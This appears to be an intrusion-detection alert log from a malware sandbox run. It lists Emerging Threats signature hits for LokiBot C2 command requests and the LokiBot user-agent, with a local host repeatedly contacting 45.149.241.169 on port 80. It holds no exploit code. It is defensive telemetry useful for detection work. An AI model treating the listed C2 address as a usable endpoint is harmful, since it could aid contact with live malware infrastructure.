2024-10-03T09:22:32.296880+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49800	TCP
2024-10-03T09:22:33.482941+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49801	TCP
2024-10-03T09:22:34.404990+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49802	TCP
2024-10-03T09:22:35.271094+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49803	TCP
2024-10-03T09:22:36.052804+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49804	TCP
2024-10-03T09:22:36.845617+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49805	TCP
2024-10-03T09:22:37.721157+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49806	TCP
2024-10-03T09:22:40.212403+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49807	TCP
2024-10-03T09:22:41.031299+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49808	TCP
2024-10-03T09:22:41.953121+0200	2025483	1	A Network Trojan was detected	45.149.241.169	80	192.168.2.10	49809	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:56.428033+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:57.649849+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:59.140817+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:21:00.116580+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:01.613318+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:03.526211+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:04.410658+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:05.365447+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:06.262913+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:07.156686+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:08.095625+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:09.011680+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.861236+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:10.868266+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:11.918016+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:12.878143+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:13.804474+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:14.643309+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:15.448371+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:17.426363+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:18.676941+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:19.692115+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:20.718523+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:21.526883+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:22.447679+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:23.391639+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:24.274196+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:25.101836+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.961812+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:26.738758+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:27.713273+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:28.560491+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:29.491681+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:30.421696+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:31.421949+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:33.372102+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:35.071052+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:36.957061+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:42.165335+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:43.028732+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.857914+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:44.832028+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:45.677355+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:46.484782+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:47.380324+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:48.314653+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:49.257250+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:51.015102+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.932714+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:52.836195+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:53.876769+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:54.813087+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:55.759857+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:57.049364+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:58.038305+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:59.153854+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:22:00.071903+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:01.204157+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:02.272358+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:03.139465+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:08.044529+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:09.292301+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:10.319663+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:11.228003+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:12.130536+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:13.083005+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:14.029913+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:15.259916+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:16.293625+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:18.382621+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:19.163958+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.984520+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:20.837934+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:21.745606+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:22.564890+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:23.426654+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:24.372920+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:25.207193+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:26.051444+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.870939+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:27.946191+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:28.768533+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:29.580351+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:30.494085+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:31.469550+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:32.287998+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:33.477823+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:34.400049+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:35.266278+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:36.047866+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.840524+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:37.716251+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:40.207040+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:41.026370+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.948130+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.10	49809	45.149.241.169	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:56.428033+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:57.649849+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:59.140817+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:21:00.116580+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:01.613318+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:03.526211+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:04.410658+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:05.365447+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:06.262913+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:07.156686+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:08.095625+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:09.011680+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.861236+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:10.868266+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:11.918016+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:12.878143+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:13.804474+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:14.643309+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:15.448371+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:17.426363+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:18.676941+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:19.692115+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:20.718523+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:21.526883+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:22.447679+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:23.391639+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:24.274196+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49740	45.149.241.169	80	TCP
2024-10-03T09:21:25.101836+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49741	45.149.241.169	80	TCP
2024-10-03T09:21:25.961812+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49742	45.149.241.169	80	TCP
2024-10-03T09:21:26.738758+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49743	45.149.241.169	80	TCP
2024-10-03T09:21:27.713273+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49744	45.149.241.169	80	TCP
2024-10-03T09:21:28.560491+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49745	45.149.241.169	80	TCP
2024-10-03T09:21:29.491681+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49746	45.149.241.169	80	TCP
2024-10-03T09:21:30.421696+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49747	45.149.241.169	80	TCP
2024-10-03T09:21:31.421949+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49749	45.149.241.169	80	TCP
2024-10-03T09:21:33.372102+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49750	45.149.241.169	80	TCP
2024-10-03T09:21:35.071052+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49751	45.149.241.169	80	TCP
2024-10-03T09:21:36.957061+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49752	45.149.241.169	80	TCP
2024-10-03T09:21:42.165335+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49753	45.149.241.169	80	TCP
2024-10-03T09:21:43.028732+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49754	45.149.241.169	80	TCP
2024-10-03T09:21:43.857914+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49755	45.149.241.169	80	TCP
2024-10-03T09:21:44.832028+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49756	45.149.241.169	80	TCP
2024-10-03T09:21:45.677355+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49757	45.149.241.169	80	TCP
2024-10-03T09:21:46.484782+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49758	45.149.241.169	80	TCP
2024-10-03T09:21:47.380324+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49759	45.149.241.169	80	TCP
2024-10-03T09:21:48.314653+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49760	45.149.241.169	80	TCP
2024-10-03T09:21:49.257250+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49761	45.149.241.169	80	TCP
2024-10-03T09:21:51.015102+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49762	45.149.241.169	80	TCP
2024-10-03T09:21:51.932714+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49763	45.149.241.169	80	TCP
2024-10-03T09:21:52.836195+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49764	45.149.241.169	80	TCP
2024-10-03T09:21:53.876769+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49765	45.149.241.169	80	TCP
2024-10-03T09:21:54.813087+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49766	45.149.241.169	80	TCP
2024-10-03T09:21:55.759857+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49767	45.149.241.169	80	TCP
2024-10-03T09:21:57.049364+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49768	45.149.241.169	80	TCP
2024-10-03T09:21:58.038305+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49769	45.149.241.169	80	TCP
2024-10-03T09:21:59.153854+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49770	45.149.241.169	80	TCP
2024-10-03T09:22:00.071903+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49771	45.149.241.169	80	TCP
2024-10-03T09:22:01.204157+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49772	45.149.241.169	80	TCP
2024-10-03T09:22:02.272358+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49773	45.149.241.169	80	TCP
2024-10-03T09:22:03.139465+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49774	45.149.241.169	80	TCP
2024-10-03T09:22:08.044529+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49775	45.149.241.169	80	TCP
2024-10-03T09:22:09.292301+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49776	45.149.241.169	80	TCP
2024-10-03T09:22:10.319663+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49777	45.149.241.169	80	TCP
2024-10-03T09:22:11.228003+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49778	45.149.241.169	80	TCP
2024-10-03T09:22:12.130536+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49779	45.149.241.169	80	TCP
2024-10-03T09:22:13.083005+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49780	45.149.241.169	80	TCP
2024-10-03T09:22:14.029913+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49781	45.149.241.169	80	TCP
2024-10-03T09:22:15.259916+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49782	45.149.241.169	80	TCP
2024-10-03T09:22:16.293625+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49783	45.149.241.169	80	TCP
2024-10-03T09:22:18.382621+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49784	45.149.241.169	80	TCP
2024-10-03T09:22:19.163958+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49785	45.149.241.169	80	TCP
2024-10-03T09:22:19.984520+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49786	45.149.241.169	80	TCP
2024-10-03T09:22:20.837934+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49787	45.149.241.169	80	TCP
2024-10-03T09:22:21.745606+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49788	45.149.241.169	80	TCP
2024-10-03T09:22:22.564890+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49789	45.149.241.169	80	TCP
2024-10-03T09:22:23.426654+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49790	45.149.241.169	80	TCP
2024-10-03T09:22:24.372920+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49791	45.149.241.169	80	TCP
2024-10-03T09:22:25.207193+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49792	45.149.241.169	80	TCP
2024-10-03T09:22:26.051444+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49793	45.149.241.169	80	TCP
2024-10-03T09:22:26.870939+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49794	45.149.241.169	80	TCP
2024-10-03T09:22:27.946191+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49795	45.149.241.169	80	TCP
2024-10-03T09:22:28.768533+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49796	45.149.241.169	80	TCP
2024-10-03T09:22:29.580351+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49797	45.149.241.169	80	TCP
2024-10-03T09:22:30.494085+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49798	45.149.241.169	80	TCP
2024-10-03T09:22:31.469550+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49799	45.149.241.169	80	TCP
2024-10-03T09:22:32.287998+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49800	45.149.241.169	80	TCP
2024-10-03T09:22:33.477823+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49801	45.149.241.169	80	TCP
2024-10-03T09:22:34.400049+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49802	45.149.241.169	80	TCP
2024-10-03T09:22:35.266278+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49803	45.149.241.169	80	TCP
2024-10-03T09:22:36.047866+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49804	45.149.241.169	80	TCP
2024-10-03T09:22:36.840524+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49805	45.149.241.169	80	TCP
2024-10-03T09:22:37.716251+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49806	45.149.241.169	80	TCP
2024-10-03T09:22:40.207040+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49807	45.149.241.169	80	TCP
2024-10-03T09:22:41.026370+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49808	45.149.241.169	80	TCP
2024-10-03T09:22:41.948130+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.10	49809	45.149.241.169	80	TCP

ET MALWARE LokiBot User-Agent (Charon/Inferno)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-03T09:20:46.743247+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49707	45.149.241.169	80	TCP
2024-10-03T09:20:47.692236+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49708	45.149.241.169	80	TCP
2024-10-03T09:20:48.567976+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49709	45.149.241.169	80	TCP
2024-10-03T09:20:56.608552+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49715	45.149.241.169	80	TCP
2024-10-03T09:20:58.316279+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49716	45.149.241.169	80	TCP
2024-10-03T09:20:59.297568+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49717	45.149.241.169	80	TCP
2024-10-03T09:21:00.494707+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49718	45.149.241.169	80	TCP
2024-10-03T09:21:01.777716+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49719	45.149.241.169	80	TCP
2024-10-03T09:21:03.684048+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49720	45.149.241.169	80	TCP
2024-10-03T09:21:04.600648+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49721	45.149.241.169	80	TCP
2024-10-03T09:21:05.528198+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49722	45.149.241.169	80	TCP
2024-10-03T09:21:06.423848+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49723	45.149.241.169	80	TCP
2024-10-03T09:21:07.339146+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49724	45.149.241.169	80	TCP
2024-10-03T09:21:08.254833+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49725	45.149.241.169	80	TCP
2024-10-03T09:21:09.163793+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49726	45.149.241.169	80	TCP
2024-10-03T09:21:10.038728+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49727	45.149.241.169	80	TCP
2024-10-03T09:21:11.038525+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49728	45.149.241.169	80	TCP
2024-10-03T09:21:12.097651+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49729	45.149.241.169	80	TCP
2024-10-03T09:21:13.053982+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49730	45.149.241.169	80	TCP
2024-10-03T09:21:13.963379+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49731	45.149.241.169	80	TCP
2024-10-03T09:21:14.812196+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49732	45.149.241.169	80	TCP
2024-10-03T09:21:15.631002+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49733	45.149.241.169	80	TCP
2024-10-03T09:21:17.618667+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49734	45.149.241.169	80	TCP
2024-10-03T09:21:18.848565+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49735	45.149.241.169	80	TCP
2024-10-03T09:21:20.073300+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49736	45.149.241.169	80	TCP
2024-10-03T09:21:20.894549+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49737	45.149.241.169	80	TCP
2024-10-03T09:21:21.709486+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49738	45.149.241.169	80	TCP
2024-10-03T09:21:22.731827+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49739	45.149.241.169	80	TCP
2024-10-03T09:21:23.541526+0200	2021641	1	A Network Trojan was detected	192.168.2.10	49740	45.149.241.169	80	TCP
